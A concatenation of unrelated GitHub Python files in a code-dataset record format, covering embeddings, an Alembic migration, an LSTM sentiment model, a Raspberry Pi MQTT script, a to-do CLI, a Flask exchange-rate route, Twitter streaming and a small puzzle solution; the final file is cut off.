fig.update_xaxes(type='category')\n\n return fig\n","repo_name":"nicolaivicol/gd-mbiz-dens-fcst","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33578568260","text":"from tqdm import tqdm\nimport numpy as np\n\n\ndef read_embeddings(fname, encoding='utf-8'):\n with open(fname, 'r', encoding=encoding) as src:\n header = src.readline()\n wordcount, vectorsize = map(int, header.split())\n word2index = {}\n vectors = np.zeros([wordcount, vectorsize])\n for i in tqdm(range(wordcount)):\n row = src.readline().split()\n if len(row) != vectorsize + 1:\n continue\n word = row[0]\n vector = np.array(list(map(float, row[1:])))\n word2index[word] = i\n vectors[i, :] = vector\n return word2index, vectors\n\n\ndef save_embeddings(fname, word2index, vectors, encoding='utf-8'):\n with open(fname, 'w', encoding=encoding) as target:\n target.write('{0} {1}\\n'.format(len(word2index), vectors.shape[1]))\n for word, index in tqdm(word2index.items(), total=len(word2index)):\n vector = vectors[index]\n vector_str = ' '.join(map(str, vector))\n target.write('{0} {1}\\n'.format(word, vector_str))\n\n\ndef cutten_embeddings(wordset, word2index, vectors):\n word2index_cut = {}\n for word in tqdm(sorted(wordset)):\n if word not in word2index:\n continue\n word2index_cut[word] = len(word2index_cut)\n vectors_cut = np.zeros([len(word2index_cut) + 1, vectors.shape[1]])\n for word, index in tqdm(word2index_cut.items()):\n vectors_cut[index, :] = vectors[word2index[word]]\n return word2index_cut, vectors_cut\n","repo_name":"QtRoS/nodl_toxic","sub_path":"toxic-neural/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11926911587","text":"\"\"\"posts tag\n\nRevision ID: c8d93aa46fe8\nRevises: 7040ce8985c8\nCreate Date: 2020-03-18 19:11:48.214433\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c8d93aa46fe8'\ndown_revision = '7040ce8985c8'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_index(op.f('ix_softwares_dateRelease'), 'softwares', ['dateRelease'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_softwares_dateRelease'), table_name='softwares')\n # ### end Alembic commands ###\n","repo_name":"pbaesse/dados-livres","sub_path":"migrations/versions/c8d93aa46fe8_posts_tag.py","file_name":"c8d93aa46fe8_posts_tag.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} +{"seq_id":"71427538920","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nimport os\nprint(os.listdir(\"../input\"))\n\n# Any results you write to the current directory are saved as output.\ntrain = pd.read_csv('../input/movie-review-sentiment-analysis-kernels-only/train.tsv', sep=\"\\t\")\ntest = pd.read_csv('../input/movie-review-sentiment-analysis-kernels-only/test.tsv', sep=\"\\t\")\nsub = pd.read_csv('../input/movie-review-sentiment-analysis-kernels-only/sampleSubmission.csv', sep=\",\")\nfull_text = list(train['Phrase'].values) + list(test['Phrase'].values)\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import OneHotEncoder\n\nimport keras \nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.layers import Dense, Input, LSTM, Embedding, Dropout, Activation, Conv1D, GRU\nfrom keras.layers import Bidirectional, GlobalMaxPool1D, MaxPooling1D, Add, Flatten\nfrom keras.layers import GlobalAveragePooling1D, GlobalMaxPooling1D, concatenate, SpatialDropout1D, BatchNormalization\nfrom keras.models import Model, load_model\nfrom keras import initializers, regularizers, constraints, optimizers, layers, callbacks\nfrom keras import backend as K\nfrom keras.engine import InputSpec, Layer\nfrom keras.optimizers import Adam, RMSprop\n\nfrom keras.callbacks import Callback, EarlyStopping, ModelCheckpoint, LearningRateScheduler\ntokenizer = Tokenizer(lower = True, filters = '')\ntokenizer.fit_on_texts(full_text)\ntrain_tokenized = tokenizer.texts_to_sequences(train['Phrase'])\ntest_tokenized = tokenizer.texts_to_sequences(test['Phrase'])\nmax_len = 50\nX_train = pad_sequences(train_tokenized, maxlen = max_len)\nX_test = pad_sequences(test_tokenized, maxlen = max_len)\nX_train.shape\nX_test.shape\nembedding_path = \"../input/fasttext-crawl-300d-2m/crawl-300d-2M.vec\"\nembed_size = 300\nmax_features = 20000\ndef get_coefs(word,*arr):\n return word, np.asarray(arr, dtype='float32')\ndef get_embed_mat(embedding_path):\n \n embedding_index = dict(get_coefs(*o.strip().split(\" \")) for o in open(embedding_path))\n\n word_index = tokenizer.word_index\n nb_words = min(max_features, len(word_index))\n embedding_matrix = np.zeros((nb_words + 1, embed_size))\n for word, i in word_index.items():\n if i >= max_features:\n continue\n embedding_vector = embedding_index.get(word)\n if embedding_vector is not None:\n embedding_matrix[i] = embedding_vector\n \n return embedding_matrix\ny = train['Sentiment']\n\none_hot_encoder = OneHotEncoder(sparse=False)\ny_one_hot = one_hot_encoder.fit_transform(y.values.reshape(-1, 1))\nfile_path = \"model.hdf5\"\ncheck_point = ModelCheckpoint(file_path, monitor = \"val_loss\", verbose = 1,\n save_best_only = True, mode = \"min\")\nearly_stop = EarlyStopping(monitor = \"val_loss\", mode = \"min\", patience = 10)\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.layers import Dense, Input, LSTM, Embedding, Dropout, Activation, Conv1D, GRU, CuDNNGRU, CuDNNLSTM, BatchNormalization\nfrom keras.layers import Bidirectional, GlobalMaxPool1D, MaxPooling1D, Add, Flatten\nfrom keras.layers import GlobalAveragePooling1D, GlobalMaxPooling1D, concatenate, SpatialDropout1D\nfrom keras.models import Model, load_model\nfrom keras import initializers, regularizers, constraints, optimizers, layers, callbacks\nfrom keras import backend as K\nfrom keras.engine import InputSpec, Layer\nfrom keras.optimizers import Adam\n\nfrom keras.callbacks import ModelCheckpoint, TensorBoard, Callback, EarlyStopping\ndef build_model(lr = 0.0, lr_d = 0.0, units = 0, dr = 0.0):\n inp = Input(shape = (max_len,))\n x = Embedding(19479, embed_size, weights = [embedding_matrix], trainable = False)(inp)\n x1 = SpatialDropout1D(dr)(x)\n\n x_gru = Bidirectional(CuDNNGRU(units, return_sequences = True))(x1)\n x1 = Conv1D(32, kernel_size=3, padding='valid', kernel_initializer='he_uniform')(x_gru)\n avg_pool1_gru = GlobalAveragePooling1D()(x1)\n max_pool1_gru = GlobalMaxPooling1D()(x1)\n \n x3 = Conv1D(32, kernel_size=2, padding='valid', kernel_initializer='he_uniform')(x_gru)\n avg_pool3_gru = GlobalAveragePooling1D()(x3)\n max_pool3_gru = GlobalMaxPooling1D()(x3)\n \n x_lstm = Bidirectional(CuDNNLSTM(units, return_sequences = True))(x1)\n x1 = Conv1D(32, kernel_size=3, padding='valid', kernel_initializer='he_uniform')(x_lstm)\n avg_pool1_lstm = GlobalAveragePooling1D()(x1)\n max_pool1_lstm = GlobalMaxPooling1D()(x1)\n \n x3 = Conv1D(32, kernel_size=2, padding='valid', kernel_initializer='he_uniform')(x_lstm)\n avg_pool3_lstm = GlobalAveragePooling1D()(x3)\n max_pool3_lstm = GlobalMaxPooling1D()(x3)\n \n \n x = concatenate([avg_pool1_gru, max_pool1_gru, avg_pool3_gru, max_pool3_gru,\n avg_pool1_lstm, max_pool1_lstm, avg_pool3_lstm, max_pool3_lstm])\n x = BatchNormalization()(x)\n x = Dropout(0.1)(Dense(128,activation='relu') (x))\n x = BatchNormalization()(x)\n x = Dropout(0.1)(Dense(64,activation='relu') (x))\n x = Dense(5, activation = \"sigmoid\")(x)\n model = Model(inputs = inp, outputs = x)\n model.compile(loss = \"binary_crossentropy\", optimizer = Adam(lr = lr, decay = lr_d), metrics = [\"accuracy\"])\n history = model.fit(X_train, y_one_hot, batch_size = 128, epochs = 20, validation_split=0.1, \n verbose = 1, callbacks = [check_point, early_stop])\n model = load_model(file_path)\n return model\nembedding_matrix = get_embed_mat(embedding_path)\nmodel = build_model(lr = 1e-3, lr_d = 0, units = 128, dr = 0.5)\npred = model.predict(X_test, batch_size = 1024, verbose = 1)\npred\npredictions = np.round(np.argmax(pred, axis=1)).astype(int)\npredictions\nsub['Sentiment'] = predictions\nsub.to_csv(\"new_sub.csv\", index=False)\n","repo_name":"aorursy/new-nb-3","sub_path":"jayachandra1221_rnn-lstm.py","file_name":"jayachandra1221_rnn-lstm.py","file_ext":"py","file_size_in_byte":6284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6831066974","text":"#rasberry pi IO\nimport RPi.GPIO as GPIO\n#MCP3008 IO\nimport Adafruit_GPIO.SPI as SPI\nimport Adafruit_MCP3008\n#MCP3008 setting up\nSPI_PORT = 0\nSPI_DEVICE = 0\nmcp = Adafruit_MCP3008.MCP3008(spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE))\n\n\n#setup LED\nledGPIOnum = 26 #pin number on PI\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(ledGPIOnum,GPIO.OUT)\nLEDstate = 0\n#setup MCP print\nsoundChannelPin = 4\ngateChannelPin = 1\naudioChannelPin = 3\n#pin channels\n#gate = 1\n#light = 2\n#audio = 3\n#envelope = 4\n\n\n\n\nimport paho.mqtt.client as mqtt\nimport json as js\nimport time\n\n#import nearby devices\nimport proximity as prox\n\n\n#MQTT_SERVER = \"localhost\"\n#MQTT_SERVER = \"iot.eclipse.org\"\n#MQTT_SERVER = \"100.80.241.236\"\nMQTT_SERVER = \"192.168.137.110\"\nMQTT_PATH = \"broadcast\"\n\nsoundValue = 0\nregistry = {}\naddressList = []\nproxRegis = {}\ncurrent_3audioReadings = {}\n\ninfo = {'device_id':'B8:27:EB:DF:DO:DD','sensors':['Temperature', 'Audio', 'Gate', 'Envelope', 'Humidity', 'Light']}\n\n\n# The callback for when the client receives a CONNACK response from the server.\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n # Subscribing in on_connect() means that if we lose the connection and\n\n #-- Finds Broadcast and Sends Data to other devices on Broadcast --#\n #if (message_sent_State == False):\n client.subscribe(MQTT_PATH)\n #client.publish(MQTT_PATH, js.dumps(info, sort_keys=True))\n message_sent_State = True\n #client.publish(MQTT_PATH, \"HMM\")\n #print(js.dumps(info, sort_keys=True))\n\n #-- Listens for response --#\n client.subscribe(info['device_id'])\n client.subscribe(info['device_id']+'/sound')\ndef on_disconnect(client, userdata, msg):\n message_sent_State = False\n\n# Callback when message is recieved.\ndef on_message(client, userdata, msg):\n global registry,proxRegis\n print(msg.topic+\" \"+str(msg.payload))\n\n\n\n #parse and save\n #if (msg.topic != info['device_id']):\n try:\n input_data = js.loads(msg.payload)\n except:\n print(\"load failed\")\n\n print(input_data)\n registry[input_data['device_id']] = input_data['sensors']\n print(input_data['device_id'])\n #publish directly to new id\n client.publish(input_data['device_id'],js.dumps(info))\n addressList = prox.proximity()\n if input_data['device_id'] in addressList:\n proxRegis[input_data['device_id']] = True\n\n else:\n proxRegis[input_data['device_id']] = False\n print(\"List if nearby devices \\n\")\n print(js.dumps(proxRegis, indent=4))\n\n\ndef on_message_Sound(client, userdata, msg):\n global registry,proxRegis,current_3audioReadings,LEDstate\n listVal = {}\n print(\"sound callback\")\n try:\n input_data = js.loads(msg.payload)\n except:\n print(\"load failed\")\n #give data to request portion\n if 'device_id' in input_data:\n print(\"DEVICE ID\")\n #for sensor in input_data['sensors']:\n listVal['Envelope'] = soundValue\n client.publish(input_data['device_id']+'/sound', js.dumps(listVal))\n #take data and compare it to ourvalues\n else:\n print(\"Soundvalue on Callback\" + str(current_3audioReadings['Envelope']))\n if int(input_data['Envelope']) > int(current_3audioReadings['Envelope']):\n print(\"DATA\")\n if LEDstate == 1:\n GPIO.output(ledGPIOnum,GPIO.LOW)\n LEDstate = 0\n if LEDstate == 0:\n GPIO.output(ledGPIOnum,GPIO.HIGH)\n LEDstate = 1\n\n#this portion is just a on_message_Sound(Request portion of Code used to\n#Colaborate with Matt's Group)\ndef on_message_clap_detected(client,userdata,msg):\n #callback function takes request from specific pi with device_id and\n #gives back our sound data to clap_response+device_id\n\n #Assumes they give the device_id\n global current_3audioReadings,LEDstate\n listVal = {}\n print(\"clap_detected request callback\")\n try:\n input_data = js.loads(msg.payload)\n except:\n print(\"load failed\")\n #iterate through values needed, find if a list of sensors exists\n if 'sensors' in input_data:\n for sensors in input_data['sensors']:\n if sensors in current_3audioReadings:\n listVal[sensors] = current_3audioReadings[sensors]\n #if the sensor wanted is empty assume they want at least one sound value\n else:\n listVal['Envelope'] = current_3audioReadings['Envelope'] #envelope value\n listVal['Gate'] = current_3audioReadings['Gate'] #envelope value\n listVal['Audio'] = current_3audioReadings['Audio'] #envelope value\n\n client.publish('clap_response'+input_data['device_id'], js.dumps(listVal))\n\n\n\nclient = mqtt.Client()\n\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.on_disonnect = on_disconnect\nclient.message_callback_add(\"B8:27:EB:DF:D0:DD/sound\", on_message_Sound)\nclient.message_callback_add(\"clap_detected\", on_message_Sound)\n\nclient.connect(MQTT_SERVER, 1883, 60)\n\ntry:\n client.publish(MQTT_PATH, js.dumps(info, sort_keys=True))\nexcept:\n print(\"Did not publish\")\n\n\n# Blocking call that processes network traffic, dispatches callbacks and\n# handles reconnecting.\n# Other loop*() functions are available that give a threaded interface and a\n# manual interface.\n#client.loop_forever()\nsoundValue = 0\nLEDstate = 0\nprevsoundValue = 0\nclient.loop_start()\nwhile True:\n\n soundValue = mcp.read_adc(soundChannelPin)#same as envelope\n gateValue = mcp.read_adc(gateChannelPin)\n auidoValue = mcp.read_adc(audioChannelPin)\n if gateValue >= 600:\n time.sleep(.2)\n print(\"made it\")\n current_3audioReadings['Gate'] = gateValue\n current_3audioReadings['Audio'] = auidoValue\n current_3audioReadings['Envelope'] = soundValue #envelope value\n\n current_soundValue = soundValue\n\n if LEDstate == 1:\n GPIO.output(ledGPIOnum,GPIO.LOW)\n LEDstate = 0\n if LEDstate == 0:\n GPIO.output(ledGPIOnum,GPIO.HIGH)\n LEDstate = 1\n\n #send to all connected devices\n wanted_info = {'device_id':'B8:27:EB:DF:D0:DD','sensors':['Gate','Envelope','Audio']}\n if proxRegis:\n for pi in proxRegis:\n #print(\"this is the pi:\" + pi)\n if ('Envelope' in registry[pi]) and (proxRegis[pi] == True):\n #print(\"This is the registry:\" + str(registry[pi]))\n client.publish(pi+'/sound', js.dumps(wanted_info))\n\n\n time.sleep(0.2)\n\n#LED pin setup\n","repo_name":"bjalvara/mqtt","sub_path":"orchestration.py","file_name":"orchestration.py","file_ext":"py","file_size_in_byte":6517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72456078119","text":"import pandas as pd\n\nclass Frecuencia:\n def __init__(self):\n self.data = pd.read_csv('../recursos/frequency_wikimedia', sep=\" \", header=None)\n self.data.columns = ['numero', 'palabra', 'frecuencia']\n self.data = self.data.drop(columns=['numero'])\n\n def obtener_frecuencia(self, palabra):\n token = palabra['token'].lower()\n if token in self.data['palabra'].tolist():\n elem = self.data.loc[self.data['palabra'] == token]['frecuencia']\n return elem.tolist()[0]\n else:\n return 0.0\n\n def obtener_mas_frecuente(self, lista_palabras):\n frecuencia_maxima = max([obtener_frecuencia(x) for x in lista_palabras])\n for palabra in lista_palabras:\n if self.obtener_frecuencia(palabra) == frecuencia_maxima:\n return palabra\n\n def ordenar_por_frecuencia(self, lista_palabras):\n return list(reversed(sorted(lista_palabras, key=self.obtener_frecuencia)))\n","repo_name":"joacolej/proygrado","sub_path":"src/recursos/lista_de_frecuencia.py","file_name":"lista_de_frecuencia.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"31716504622","text":"import pprint #like var_dump\nimport sys\nimport os #files\nimport csv \n\n\nDATABASEFILE=\"database.csv\"\nCHECKBOX_COLUMN_NAME='Done'\nTODO_COLUMN_NAME='To do'\n\nclass bcolors:\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n Default = '\\033[99m'\n\n\ndef clear_console():\n \"\"\"Clearing console\"\"\"\n os.system('cls' if os.name=='nt' else 'clear')\n\n\ndef print_warning(warning, type='yellow'):\n \"\"\"Information print\"\"\"\n if type=='yellow':\n print(bcolors.WARNING+\"------------------------------\\n\"\n + warning\n +\" \\n------------------------------\"+bcolors.ENDC)\n \n if type=='red':\n print(bcolors.FAIL+\"------------------------------\\n\"\n + warning\n +\" \\n------------------------------\\n\"+bcolors.ENDC)\n if type=='green':\n print(bcolors.OKGREEN+\"------------------------------\\n\"\n + warning\n +\" \\n------------------------------\\n\"+bcolors.ENDC) \n\n\n\ndef add(item_to_add):\n \"\"\"Add item to list in file\"\"\"\n\n with open(DATABASEFILE, 'a' ) as csvfile:\n fieldnames = [CHECKBOX_COLUMN_NAME, TODO_COLUMN_NAME]\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writerow({CHECKBOX_COLUMN_NAME: ' ', TODO_COLUMN_NAME: item_to_add})\n clear_console()\n print_warning(\"Item added.\", 'green') \n todo_list(write=True)\n \n\ndef save_to_file(data):\n \"\"\"Save data to file\"\"\"\n\n with open(DATABASEFILE, 'w') as csvfile:\n fieldnames = [CHECKBOX_COLUMN_NAME, TODO_COLUMN_NAME]\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n \n for item in data:\n writer.writerow({CHECKBOX_COLUMN_NAME: item[1], TODO_COLUMN_NAME: item[2]})\n\n\ndef todo_list(write=0):\n \"\"\"List of todo\"\"\"\n \n with open(DATABASEFILE, newline='') as f:\n reader = csv.reader(f)\n list_todo = []\n if write is True:\n print(\"You saved the following to-do items: \\n \")\n i=0\n for row in reader:\n if i != 0:\n print(\" %3d.\" % (i) + \" [\" + str(row[0]) + \"] \" + str(row[1]))\n list_todo.append([i, row[0], row[1]])\n i+=1\n print()\n i=0 \n \n for row in reader:\n list_todo.append([i, row[0], row[1]])\n i+=1\n\n return list_todo \n\n\ndef mark_todo(mark=True):\n \"\"\"marking items\"\"\" \n \n td_list=todo_list(True) #write todo list\n while True:\n try: \n if (mark==False):\n mark_number=input('Which one you want to unmark (or Press Enter to leave): ')\n if mark_number=='x' or mark_number=='':\n clear_console()\n todo_list(write=True)\n break\n td_list[int(mark_number)][1]=str(' ')\n clear_console()\n print_warning(\"Item unmarked.\") \n else:\n mark_number=input('Which one you want to mark as completed (or Press Enter to leave): ')\n if mark_number=='x' or mark_number=='':\n clear_console()\n todo_list(write=True)\n break\n td_list[int(mark_number)][1]='x' \n clear_console()\n print_warning(\"Item marked.\") \n save_to_file(td_list) \n todo_list(write=True)\n\n except ValueError:\n \n clear_console()\n print_warning(\"It is not a number.\",'red') \n mark_todo()\n except IndexError:\n clear_console()\n print_warning(\"There is no item with this ID\",'red') \n mark_todo()\n\n \n \ndef archive():\n \"\"\"delete marked items from list\"\"\"\n\n to_do_list=todo_list(0)\n newtodolist=[]\n for item in to_do_list:\n if item[1] != 'x':\n newtodolist.append([' ', item[1], item[2]]) \n \n save_to_file(newtodolist)\n print_warning(\"Deleted marked items\", 'red')\n todo_list(write=True)\n\n\ndef checkdatabase():\n \"\"\"checking database file, if !exist than create it\"\"\" \n\n if not os.path.exists(DATABASEFILE):\n with open(DATABASEFILE, 'w') as csvfile:\n fieldnames = [CHECKBOX_COLUMN_NAME, TODO_COLUMN_NAME]\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n \n\ndef main():\n clear_console()\n todo_list(write=True)\n\n while True:\n \n action=input( \"Please specify a command [add, mark, unmark, archive, x to exit]: \")\n clear_console()\n\n if action == \"add\": #loop: adding todo items\n item_to_add=' '\n todo_list(write=True)\n while item_to_add!='':\n item_to_add=input('Add an item (or press enter to leave): ')\n if (item_to_add!=''):\n add(item_to_add)\n else:\n clear_console()\n todo_list(write=True)\n \n\n elif action == \"list\": #this is not used, list is always visible\n clear_console()\n todo_list(write=True)\n\n elif action == \"mark\":\n mark_todo()\n \n\n elif action == \"unmark\":\n mark_todo(False)\n \n\n elif action == \"archive\":\n archive()\n \n\n elif action==\"x\": #exit program\n break \n \n else:\n print_warning(\"Error: wrong command!\", 'red') \n todo_list(write=True)\n \n\n\n\ncheckdatabase() #if file doesn't exist than create it'\nmain()","repo_name":"michalosak/calculator","sub_path":"todo.py","file_name":"todo.py","file_ext":"py","file_size_in_byte":5747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31343441875","text":"import subprocess\nimport os\nimport stat\nimport platform\n\nfrom helpers import asyncronize_function\n\nconverter_path = None\n\nif \"Windows\" in platform.architecture()[1]:\n converter_path = \"./ffmpeg.exe\"\nelse:\n converter_path = \"./ffmpeg\"\n st = os.stat(\"./ffmpeg\")\n os.chmod(\"./ffmpeg\", st.st_mode | stat.S_IEXEC)\n\nasync def convert(voice_ogg_content):\n completedProcess = await asyncronize_function(\n subprocess.run,\n [converter_path, \"-i\", \"pipe:0\", \"-f\", \"wav\", \"pipe:1\"],\n input=voice_ogg_content,\n capture_output=True\n )\n return completedProcess.stdout","repo_name":"dozen1488/telebot","sub_path":"modules/convert_ogg_module.py","file_name":"convert_ogg_module.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28184811690","text":"from dataclasses import asdict\n\nimport requests\nfrom flask import request, jsonify, Blueprint\nfrom config import configuration\nfrom app.dto.get_exchange_rate_response import GetExchangeRateResponse\nfrom app.helpers.check_currencies import check_currencies\nfrom app.decorators.auth import token_required\n\nmodule = Blueprint(\"exchange\", __name__, url_prefix=\"/exchange\")\n\n\n@module.route('/pair', methods=['POST', 'GET'])\n@token_required()\ndef get_exchange_rate():\n from_currency = request.json['from'] # marshmallow Validation icin.\n to_currency = request.json['to']\n url = configuration.BASE_URL + configuration.API_KEY\n if check_currencies(from_currency, to_currency):\n pair_url = url + \"/pair/\" + from_currency + \"/\" + to_currency\n print(\"pair_url \" + pair_url)\n print(\"pair_url \" + pair_url)\n response = requests.get(pair_url)\n conversion_rate = response.json()['conversion_rate']\n base_code = response.json()['base_code']\n target_code = response.json()['target_code']\n return asdict(\n GetExchangeRateResponse(conversion_rate=conversion_rate,\n base_code=base_code,\n target_code=target_code))\n else:\n return jsonify({\"conversion_rate\": \"The Currency is not correct!!!\"})\n","repo_name":"ozgurshahin/ExchangeRateApi","sub_path":"app/routes/exchange.py","file_name":"exchange.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36782941916","text":"from tweepy import Stream\nfrom tweepy import OAuthHandler\nfrom tweepy.streaming import StreamListener\nimport json\nimport twitter_credentials as tw\nfrom google.cloud import pubsub_v1\n#from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\n\n\n#analyzer = SentimentIntensityAnalyzer()\n\nproject_id = \"cf-learninggcp-123\"\ntopic_name = \"tweets\"\n\npublisher = pubsub_v1.PublisherClient()\ntopic_path = publisher.topic_path(project_id, topic_name)\n\n#consumer key, consumer secret, access token, access secret.\nckey=tw.CONSUMER_KEY\ncsecret=tw.CONSUMER_SECRET\natoken=tw.ACCESS_TOKEN\nasecret=tw.ACCESS_TOKEN_SECRET\n\nclass listener(StreamListener):\n\n def on_data(self, data):\n try:\n data = json.loads(data)\n tweet = data['text']\n created_at = data['created_at']\n source = data['source']\n usuario = data['user']['name']\n ubicacion = data['user']['location']\n coordenadas = data['geo']\n time_ms = data['timestamp_ms']\n # vs = analyzer.polarity_scores(tweet)\n # sentiment = vs['compound']\n mensaje = json.dumps({\"twitter\": tweet, \"time_stamp\": time_ms, \"created_at\": created_at, \"source\": source, 'usuario': usuario, 'ubicacion': ubicacion, 'coordenadas': coordenadas})\n\n print(mensaje)\n future = publisher.publish(topic_path, mensaje)\n print(future.result())\n\n except KeyError as e:\n print(str(e))\n return(True)\n\n def on_error(self, status):\n print(status)\n\nauth = OAuthHandler(ckey, csecret)\nauth.set_access_token(atoken, asecret)\n\ntwitterStream = Stream(auth, listener())\ntwitterStream.filter(track=[\"fibertel\", \"cablevision\", \"@personal\"])","repo_name":"cesarfarallo/twitter","sub_path":"twitter_TECO.py","file_name":"twitter_TECO.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22041190542","text":"# 팔씨름 문제\n\n# 소정이와 세정이는 점심 값을 누가 낼 지 정하기 위해 팔씨름을 하기로 했다. 공정하고 재밌는 경기를 위해 둘은 15번 팔씨름을 하여 8번 이상 이기는 사람이 점심 값을 면제받기로 하였다.\n\n# 둘은 지금까지 k번의 팔씨름을 진행했다. 이 결과는 길이가 k인 ‘o’ 또는 ‘x’로만 구성된 문자열 S[1..k]로 나타낼 수 있다. S[i]가 ‘o’면 소정이가 i번째 경기에서 승리했다는 것이고, ‘x’면 패배했다는 것이다.\n\n# 소정이는 앞으로 팔씨름을 15번째 경기까지 진행했을 때 자신이 점심값을 면제받을 가���성이 있는지 알고자 한다. 이를 대신해 주는 프로그램을 작성하라.\n\n# [입력]\n# 첫 번째 줄에 테스트 케이스의 수 T가 주어진다.\n# 각 테스트 케이스는 하나의 줄로 이루어진다. 각 줄에는 ‘o’ 또는 ‘x’로만 구성된 길이가 1 이상 15 이하인 문자열 S가 주어진다.\n\n# [출력]\n# 각 테스트 케이스마다, 소정이가 점심값을 면제받을 가능성이 있다면 ‘YES’, 없다면 ‘NO’를 출력한다.\n\n# 입력\n# 3\n# oxoxoxoxoxoxoxo\n# x\n# xxxxxxxxxxxx\n\n# 출력\n# #1 YES\n# #2 YES\n# #3 NO\n\nT = int(input())\nfor tc in range(1, T+1):\n s = input()\n \n # 이긴 횟수 카운트 \n num_wins = s.count('o')\n\n # 남은 판수 카운트\n num_remaining = 15 - len(s)\n\n # 남은 판수와 이긴 횟수를 더한 것이 8번 이상이면 승리 가능성\n if num_wins + num_remaining >= 8:\n print(f\"#{tc} YES\")\n else:\n print(f\"{tc} NO\")","repo_name":"glory0224/Algorithm","sub_path":"SWEA/D3/arm wrestling.py","file_name":"arm wrestling.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30393608348","text":"r\"\"\"Parse command line arguments\n\nCommand parameters:\n refresh : bool - Refresh data from remote server.\n num_workers : int - Number of workers for threading.\n options : dict - Options for GET request to hh api.\n\nExample:\n options:\n {\n \"text\": \"Python Developer\",\n \"area\": 1,\n \"per_page\": 50\n }\n\nParser parameters:\n update : bool - Update JSON config if needed.\n\n------------------------------------------------------------------------\n\nGNU GENERAL PUBLIC LICENSE\nVersion 3, 29 June 2007\n\nCopyright (c) 2020 Kapitanov Alexander\n\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nYou should have received a copy of the GNU General Public License\nalong with this program. If not, see .\n\nTHERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY\nAPPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT\nHOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM \"AS IS\" WITHOUT\nWARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT\nNOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\nFOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND\nPERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE\nDEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR\nOR CORRECTION.\n\n------------------------------------------------------------------------\n\"\"\"\n\n# Authors : Alexander Kapitanov\n# ...\n# Contacts : \n# License : GNU GENERAL PUBLIC LICENSE\n\nimport argparse\nimport json\nfrom typing import Dict, Optional, Sequence\n\n\nclass Settings:\n r\"\"\"Researcher parameters\n\n Parameters\n ----------\n config_path : str\n Path to config file\n input_args : tuple\n Command line arguments for tests.\n no_parse : bool\n Disable parsing arguments from command line.\n\n Attributes\n ----------\n options : dict\n Options for GET request to API.\n refresh : bool\n Refresh data from remote server.\n save_result : bool\n Save DataFrame with parsed vacancies to CSV file\n num_workers : int\n Number of workers for threading.\n rates : dict\n Dict of currencies. For example: {\"RUB\": 1, \"USD\": 0.001}\n \"\"\"\n\n def __init__(\n self, config_path: str, input_args: Optional[Sequence[str]] = None, no_parse: bool = False,\n ):\n self.options: Optional[Dict] = None\n self.rates: Optional[Dict] = None\n self.refresh: bool = False\n self.num_workers: int = 1\n self.save_result: bool = False\n self.update: bool = False\n\n # Get config from file\n with open(config_path, 